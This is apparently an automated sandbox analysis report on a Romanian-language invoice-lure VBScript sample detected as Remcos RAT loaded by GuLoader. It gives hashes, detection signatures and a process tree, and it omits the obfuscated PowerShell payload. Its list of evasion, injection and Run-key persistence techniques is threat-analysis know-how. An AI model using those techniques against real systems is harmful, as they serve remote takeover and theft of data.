Windows Analysis Report
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
Overview
General Information
Sample name: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs (renamed because original name is a hash value)
Original sample name: IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs
Analysis ID: 1538533
MD5: a8da570deac5f16a0050802c0da5d7dd
SHA1: 9d8992e3770e41d8a431350e1cef73492dc240ea
SHA256: c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
Tags: vbs, user-lowmal3
Detection
Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7768, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- PING.EXE (PID: 7808, cmdline: ping gormezl_6777.6777.6777.677e, MD5: 2F46799D79D22AC72C241EC0322B011D)
- conhost.exe (PID: 7816, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7876, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by a very long obfuscated script argument [obfuscated command line omitted])